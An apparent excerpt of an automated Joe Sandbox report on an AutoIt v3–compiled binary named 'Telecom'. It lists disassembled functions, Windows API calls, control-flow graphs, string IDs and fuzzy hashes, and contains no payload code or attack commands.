                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: 0$Q$0$Q$TaskbarCreated
                                                      • API String ID: 129472671-1685287855
                                                      • Opcode ID: 87415d94e71d2555d7e1b69e41d596cd11b8bbc0303c4e95dd827b630a5dd130
                                                      • Instruction ID: e59e11504671eaf058eb1c8e676653c912f0e6611cdae2685b6d2d6b8fffe3f8
                                                      • Opcode Fuzzy Hash: 87415d94e71d2555d7e1b69e41d596cd11b8bbc0303c4e95dd827b630a5dd130
                                                      • Instruction Fuzzy Hash: C14115F0200140BBFB143F6C8C49BBA3BA9E715B17F00C52BF58585291CA7C9B59936E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 527 4809db-480a0b call 4807af 530 480a0d-480a18 call 46f636 527->530 531 480a26-480a32 call 475594 527->531 536 480a1a-480a21 call 46f649 530->536 537 480a4b-480a94 call 48071a 531->537 538 480a34-480a49 call 46f636 call 46f649 531->538 548 480cfd-480d03 536->548 546 480b01-480b0a GetFileType 537->546 547 480a96-480a9f 537->547 538->536 552 480b0c-480b3d GetLastError call 46f613 CloseHandle 546->552 553 480b53-480b56 546->553 550 480aa1-480aa5 547->550 551 480ad6-480afc GetLastError call 46f613 547->551 550->551 557 480aa7-480ad4 call 48071a 550->557 551->536 552->536 564 480b43-480b4e call 46f649 552->564 555 480b58-480b5d 553->555 556 480b5f-480b65 553->556 560 480b69-480bb7 call 4754dd 555->560 556->560 561 480b67 556->561 557->546 557->551 570 480bb9-480bc5 call 48092b 560->570 571 480bc7-480beb call 4804cd 560->571 561->560 564->536 570->571 578 480bef-480bf9 call 478a2e 570->578 576 480bed 571->576 577 480bfe-480c41 571->577 576->578 580 480c62-480c70 577->580 581 480c43-480c47 577->581 578->548 584 480cfb 580->584 585 480c76-480c7a 580->585 581->580 583 480c49-480c5d 581->583 583->580 584->548 585->584 586 480c7c-480caf CloseHandle call 48071a 585->586 589 480cb1-480cdd GetLastError call 46f613 call 4756a6 586->589 590 480ce3-480cf7 586->590 589->590 590->584
                                                      APIs
                                                        • Part of subcall function 0048071A: CreateFileW.KERNEL32(00000000,00000000,?,00480A84,?,?,00000000,?,00480A84,00000000,0000000C), ref: 00480737
                                                      • GetLastError.KERNEL32 ref: 00480AEF
                                                      • __dosmaperr.LIBCMT ref: 00480AF6
                                                      • GetFileType.KERNEL32(00000000), ref: 00480B02
                                                      • GetLastError.KERNEL32 ref: 00480B0C
                                                      • __dosmaperr.LIBCMT ref: 00480B15
                                                      • CloseHandle.KERNEL32(00000000), ref: 00480B35
                                                      • CloseHandle.KERNEL32(?), ref: 00480C7F
                                                      • GetLastError.KERNEL32 ref: 00480CB1
                                                      • __dosmaperr.LIBCMT ref: 00480CB8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 9bcb141f0946f18b840213b59c1dd817fc21eb978a60dfdf7279ac8908129a66
                                                      • Instruction ID: e250e10eda2558978163ccb2e1f5e1fb58157aa2b14b6771d7ec6e155bf76628
                                                      • Opcode Fuzzy Hash: 9bcb141f0946f18b840213b59c1dd817fc21eb978a60dfdf7279ac8908129a66
                                                      • Instruction Fuzzy Hash: 71A12732A201048FDF19EF68D852BAE7BA0AB06324F14415EF811DB3D1D7399D1BCB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00445594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 004455B2
                                                        • Part of subcall function 00445238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0044525A
                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004453C4
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00484BFD
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00484C3E
                                                      • RegCloseKey.ADVAPI32(?), ref: 00484C80
                                                      • _wcslen.LIBCMT ref: 00484CE7
                                                      • _wcslen.LIBCMT ref: 00484CF6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 98802146-2727554177
                                                      • Opcode ID: 7baa34d64a466d9c47a3f87724222343817d1be1fe50225dfe7d317cb89cf7c4
                                                      • Instruction ID: 6f0c175784aedcd4d3f2c6523134e9b7f14f2b21efce8a13e12c8cde6d0083cc
                                                      • Opcode Fuzzy Hash: 7baa34d64a466d9c47a3f87724222343817d1be1fe50225dfe7d317cb89cf7c4
                                                      • Instruction Fuzzy Hash: BE71AF715043019BD700EF66EC5199BBBE8FFA9344F80882FF45193260EB75DA49CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 004434DE
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004434ED
                                                      • LoadIconW.USER32(00000063), ref: 00443503
                                                      • LoadIconW.USER32(000000A4), ref: 00443515
                                                      • LoadIconW.USER32(000000A2), ref: 00443527
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0044353F
                                                      • RegisterClassExW.USER32(?), ref: 00443590
                                                        • Part of subcall function 00443624: GetSysColorBrush.USER32(0000000F), ref: 00443657
                                                        • Part of subcall function 00443624: RegisterClassExW.USER32(00000030), ref: 00443681
                                                        • Part of subcall function 00443624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00443692
                                                        • Part of subcall function 00443624: InitCommonControlsEx.COMCTL32(?), ref: 004436AF
                                                        • Part of subcall function 00443624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004436BF
                                                        • Part of subcall function 00443624: LoadIconW.USER32(000000A9), ref: 004436D5
                                                        • Part of subcall function 00443624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004436E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: f961d6c7b048c8f74bbf81cca2c492a8e1a6c1a28a774a759ab175bbfd892e70
                                                      • Instruction ID: bb2cfea494da681d62cc1e5dd5788e7b13a7a6bea600d0e340d231f665a0fc75
                                                      • Opcode Fuzzy Hash: f961d6c7b048c8f74bbf81cca2c492a8e1a6c1a28a774a759ab175bbfd892e70
                                                      • Instruction Fuzzy Hash: E9215070D00314ABDB109FA5EC55BD9BFB4FB18B50F00842BF614A63A0C3B90598DF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 668 443b39-443b5c 669 443b62-443bcb call 46017b call 447aab call 44bf73 call 447aab * 2 call 446fa2 668->669 670 48415f-484172 call 4aa215 668->670 704 443bd1-443bde call 446e1b call 446c5f 669->704 705 484591-4845a1 call 4aa215 669->705 676 484179-484181 670->676 678 484191-484199 676->678 679 484183-48418b 676->679 682 48419b-4841a2 678->682 683 4841a4-4841ac 678->683 679->678 681 443bfa-443c69 call 44bf73 call 443ae9 call 44bf73 call 445851 call 443b1c call 446d47 679->681 718 4841da-4841e5 681->718 719 443c6f-443cde call 44bf73 * 2 call 44568e call 447bb5 SetCurrentDirectoryW call 44bd98 * 2 call 46017b call 44423c 681->719 689 4841cc-4841d5 call 4ad5aa 682->689 685 4841ae-4841b5 683->685 686 4841b7-4841bf 683->686 685->689 686->681 691 4841c5-4841c7 686->691 689->681 691->689 715 443be3-443bf4 call 446c48 704->715 711 4845a6 705->711 711->711 715->676 715->681 718->719 721 4841eb-48421e call 447aab call 446679 718->721 765 443ce2-443ce7 719->765 732 484528-48453f call 4aa215 721->732 733 484224-48424b call 4b36b8 call 4466e7 721->733 741 443e3b-443e86 call 44bd98 * 2 call 447aab call 44bd98 call 447aab call 460184 732->741 733->732 746 484251-4842cd call 46014b call 44bc8f call 44bba9 733->746 767 4842d3-4842f5 call 44bc8f 746->767 768 484495-4844d1 call 44bc8f call 4b148b call 4a4ad3 call 464cee 746->768 769 443e07-443e28 call 447aab SetCurrentDirectoryW 765->769 770 443ced-443cfa call 44ae4e 765->770 785 48430b-484316 call 4b1591 767->785 786 4842f7-484306 767->786 820 4844d3-4844f8 call 445e60 call 460184 call 4b1473 768->820 769->741 782 443e2a-443e38 call 46013d call 460184 769->782 770->769 787 443d00-443d1c call 444129 call 444089 770->787 782->741 802 484318-48432e 785->802 803 484333-48433e call 4b157d 785->803 791 484427-48443a call 44bba9 786->791 810 443d22-443d39 call 44404e call 464cd3 787->810 811 484574-48458c call 4aa215 787->811 791->767 808 484440-48444a 791->808 802->791 816 484340-48434f 803->816 817 484354-48435f call 45e68d 803->817 813 48444c-48445a 808->813 814 48447d call 4aa571 808->814 837 443d5c-443d5f 810->837 838 443d3b-443d56 call 466735 810->838 811->769 813->814 821 48445c-48447b call 444176 813->821 822 484482-48448f 814->822 816->791 817->791 832 484365-484381 call 4a9ff8 817->832 820->741 821->822 822->767 822->768 846 4843b0-4843b3 832->846 847 484383-4843ae call 44b329 call 44bd98 832->847 842 443d65-443d6a 837->842 843 443e89-443e8f 837->843 838->837 838->843 849 443d70-443d92 call 44b329 call 443eab 842->849 850 484555-48455d call 4a9ec0 842->850 843->842 845 443e95-484550 843->845 845->842 851 4843ef-4843f2 846->851 852 4843b5-4843db call 44b329 call 447de8 call 44bd98 846->852 891 4843dc-4843ed call 44bc8f 847->891 867 443d97-443da9 849->867 868 484562-484565 850->868 861 484413-484417 call 4b1519 851->861 862 4843f4-4843fd call 4a9f27 851->862 852->891 870 48441c-484426 call 460184 861->870 873 4844fd-484526 call 4aa215 call 460184 call 464cee 862->873 874 484403-48440e call 460184 862->874 875 443dc6-443dc8 867->875 876 443dab-443dc2 call 460184 call 46013d 867->876 877 48456b-48456f 868->877 878 443e9e-443ea6 868->878 870->791 873->820 874->767 889 443dce-443dd1 875->889 890 443e9a 875->890 876->875 877->878 886 443df4-443e01 878->886 886->765 886->769 889->878 896 443dd7-443dda 889->896 890->878 891->870 896->868 900 443de0-443def call 444176 896->900 900->886
                                                      APIs
                                                        • Part of subcall function 00447AAB: FindCloseChangeNotification.KERNEL32(?,?,00000000,00483A42), ref: 00447ACB
                                                        • Part of subcall function 00446FA2: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00443BC9,?,00008000), ref: 00446FD0
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00443CAD
                                                      • _wcslen.LIBCMT ref: 00443D2C
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00443E17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 2701412040-3738523708
                                                      • Opcode ID: 37a30f085df7df0419885ed27fd8600ca952bb3b83cf9d568ae2bf21bb68a431
                                                      • Instruction ID: 75b79c83ea8cd499edcaf456c37a7899006000db44d21da55047e0db891f44f4
                                                      • Opcode Fuzzy Hash: 37a30f085df7df0419885ed27fd8600ca952bb3b83cf9d568ae2bf21bb68a431
                                                      • Instruction Fuzzy Hash: 492288705083419FD724EF25C881AAFBBE4AF99708F10091FF485932A1DB39DA49CB5B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 907 4c0fb8-4c0fef call 44e6a0 910 4c100f-4c1021 WSAStartup 907->910 911 4c0ff1-4c0ffe call 44c98d 907->911 913 4c1054-4c1091 call 45c1f6 call 448ec0 call 45f9d4 inet_addr gethostbyname 910->913 914 4c1023-4c1031 910->914 911->910 919 4c1000-4c100b call 44c98d 911->919 930 4c10a2-4c10b0 913->930 931 4c1093-4c10a0 IcmpCreateFile 913->931 916 4c1036-4c1046 914->916 917 4c1033 914->917 920 4c1048 916->920 921 4c104b-4c104f 916->921 917->916 919->910 920->921 925 4c1249-4c1251 921->925 933 4c10b5-4c10c5 930->933 934 4c10b2 930->934 931->930 932 4c10d3-4c1100 call 46017b call 44423c 931->932 943 4c112b-4c1148 IcmpSendEcho 932->943 944 4c1102-4c1129 IcmpSendEcho 932->944 935 4c10ca-4c10ce 933->935 936 4c10c7 933->936 934->933 938 4c1240-4c1244 call 44bd98 935->938 936->935 938->925 945 4c114c-4c114e 943->945 944->945 946 4c11ae-4c11bc 945->946 947 4c1150-4c1155 945->947 950 4c11be 946->950 951 4c11c1-4c11c8 946->951 948 4c11f8-4c120a call 44e6a0 947->948 949 4c115b-4c1160 947->949 965 4c120c-4c120e 948->965 966 4c1210 948->966 953 4c11ca-4c11d8 949->953 954 4c1162-4c1167 949->954 950->951 952 4c11e4-4c11ed 951->952 958 4c11ef 952->958 959 4c11f2-4c11f6 952->959 956 4c11dd 953->956 957 4c11da 953->957 954->946 960 4c1169-4c116e 954->960 956->952 957->956 958->959 962 4c1212-4c1229 IcmpCloseHandle WSACleanup 959->962 963 4c1170-4c1175 960->963 964 4c1193-4c11a1 960->964 962->938 970 4c122b-4c123d call 46013d call 460184 962->970 963->953 967 4c1177-4c1185 963->967 968 4c11a6-4c11ac 964->968 969 4c11a3 964->969 965->962 966->962 971 4c118a-4c1191 967->971 972 4c1187 967->972 968->952 969->968 970->938 971->952 972->971
                                                      APIs
                                                      • WSAStartup.WS2_32(00000101,?), ref: 004C1019
                                                      • inet_addr.WSOCK32(?), ref: 004C1079
                                                      • gethostbyname.WS2_32(?), ref: 004C1085
                                                      • IcmpCreateFile.IPHLPAPI ref: 004C1093
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004C1123
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004C1142
                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 004C1216
                                                      • WSACleanup.WSOCK32 ref: 004C121C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 22fe3e553a1f1ecb63cffb48a7fbbffaaeb4fd342e1837a81cd9cfc11defd932
                                                      • Instruction ID: d52f2c81645c672db72adc6263ba265fd34d0a3a1a233215ca288592df0f8d53
                                                      • Opcode Fuzzy Hash: 22fe3e553a1f1ecb63cffb48a7fbbffaaeb4fd342e1837a81cd9cfc11defd932
                                                      • Instruction Fuzzy Hash: 0291C0396042419FD360DF15C888F16BBE0AF49318F1885AEF5658B7B2CB38ED45CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.$t5Q$t5Q$t5Q$t5Q$t5Qt5Q
                                                      • API String ID: 0-4008631601
                                                      • Opcode ID: a5398245558607d25d452547b68d539924164610d14106b269e0d02656476e8a
                                                      • Instruction ID: a31049d06444b563303dcafe5067aa7e26ab24780acb73f1861cc2974784c632
                                                      • Opcode Fuzzy Hash: a5398245558607d25d452547b68d539924164610d14106b269e0d02656476e8a
                                                      • Instruction Fuzzy Hash: C7C29F75E00204DFDB24CF58C890AAEB7B1FF45304F24816BE945AB351E339AD4ACB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0044327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004432AF
                                                        • Part of subcall function 0044327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 004432B7
                                                        • Part of subcall function 0044327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004432C2
                                                        • Part of subcall function 0044327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004432CD
                                                        • Part of subcall function 0044327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 004432D5
                                                        • Part of subcall function 0044327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 004432DD
                                                        • Part of subcall function 00443205: RegisterWindowMessageW.USER32(00000004,?,00442964), ref: 0044325D
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00442A0A
                                                      • OleInitialize.OLE32 ref: 00442A28
                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00483A0D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID: (&Q$0$Q$4'Q$d(Q$$Q
                                                      • API String ID: 1986988660-34255742
                                                      • Opcode ID: 7a153f34f402f108e44415faa7fbddce1aa6d12aec066ab5395effa9447b04eb
                                                      • Instruction ID: 152b8ae8afe79679cb1c6d51f61d2669b20de844ed49c841354691ce4aaeefba
                                                      • Opcode Fuzzy Hash: 7a153f34f402f108e44415faa7fbddce1aa6d12aec066ab5395effa9447b04eb
                                                      • Instruction Fuzzy Hash: A271A1B09013009ED788EF7AADA56D53AE2FB68304F42C56ED408CB371EB744469EF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1612 4790c5-4790d5 1613 4790d7-4790ea call 46f636 call 46f649 1612->1613 1614 4790ef-4790f1 1612->1614 1630 479471 1613->1630 1616 4790f7-4790fd 1614->1616 1617 479459-479466 call 46f636 call 46f649 1614->1617 1616->1617 1620 479103-47912e 1616->1620 1635 47946c call 472b5c 1617->1635 1620->1617 1623 479134-47913d 1620->1623 1626 479157-479159 1623->1626 1627 47913f-479152 call 46f636 call 46f649 1623->1627 1628 479455-479457 1626->1628 1629 47915f-479163 1626->1629 1627->1635 1634 479474-479479 1628->1634 1629->1628 1633 479169-47916d 1629->1633 1630->1634 1633->1627 1638 47916f-479186 1633->1638 1635->1630 1641 4791a3-4791ac 1638->1641 1642 479188-47918b 1638->1642 1645 4791ae-4791c5 call 46f636 call 46f649 call 472b5c 1641->1645 1646 4791ca-4791d4 1641->1646 1643 479195-47919e 1642->1643 1644 47918d-479193 1642->1644 1649 47923f-479259 1643->1649 1644->1643 1644->1645 1674 47938c 1645->1674 1647 4791d6-4791d8 1646->1647 1648 4791db-4791dc call 473b93 1646->1648 1647->1648 1656 4791e1-4791f9 call 472d38 * 2 1648->1656 1651 47925f-47926f 1649->1651 1652 47932d-479336 call 47fc1b 1649->1652 1651->1652 1655 479275-479277 1651->1655 1665 4793a9 1652->1665 1666 479338-47934a 1652->1666 1655->1652 1659 47927d-4792a3 1655->1659 1682 479216-47923c call 4797a4 1656->1682 1683 4791fb-479211 call 46f649 call 46f636 1656->1683 1659->1652 1663 4792a9-4792bc 1659->1663 1663->1652 1670 4792be-4792c0 1663->1670 1672 4793ad-4793c5 ReadFile 1665->1672 1666->1665 1668 47934c-47935b GetConsoleMode 1666->1668 1668->1665 1673 47935d-479361 1668->1673 1670->1652 1675 4792c2-4792ed 1670->1675 1677 4793c7-4793cd 1672->1677 1678 479421-47942c GetLastError 1672->1678 1673->1672 1679 479363-47937d ReadConsoleW 1673->1679 1680 47938f-479399 call 472d38 1674->1680 1675->1652 1681 4792ef-479302 1675->1681 1677->1678 1686 4793cf 1677->1686 1684 479445-479448 1678->1684 1685 47942e-479440 call 46f649 call 46f636 1678->1685 1689 47937f GetLastError 1679->1689 1690 47939e-4793a7 1679->1690 1680->1634 1681->1652 1694 479304-479306 1681->1694 1682->1649 1683->1674 1691 479385-47938b call 46f613 1684->1691 1692 47944e-479450 1684->1692 1685->1674 1688 4793d2-4793e4 1686->1688 1688->1680 1699 4793e6-4793ea 1688->1699 1689->1691 1690->1688 1691->1674 1692->1680 1694->1652 1702 479308-479328 1694->1702 1705 479403-47940e 1699->1705 1706 4793ec-4793fc call 478de1 1699->1706 1702->1652 1711 479410 call 478f31 1705->1711 1712 47941a-47941f call 478c21 1705->1712 1717 4793ff-479401 1706->1717 1718 479415-479418 1711->1718 1712->1718 1717->1680 1718->1717
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 868a7a7363c760ac66ec680e74cfd9b149303133fb0841270f2cce5c7bb02c90
                                                      • Instruction ID: 337116fcdcb1a9da79beea08930d1ca15c18865feca4b3f0a18d43371bd26052
                                                      • Opcode Fuzzy Hash: 868a7a7363c760ac66ec680e74cfd9b149303133fb0841270f2cce5c7bb02c90
                                                      • Instruction Fuzzy Hash: 27C12771D04349AFDF11DFA9D841BEE7BB0AF09304F04809AE958A7392C7389D46CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004435E1
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00443602
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00443368,?), ref: 00443616
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00443368,?), ref: 0044361F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
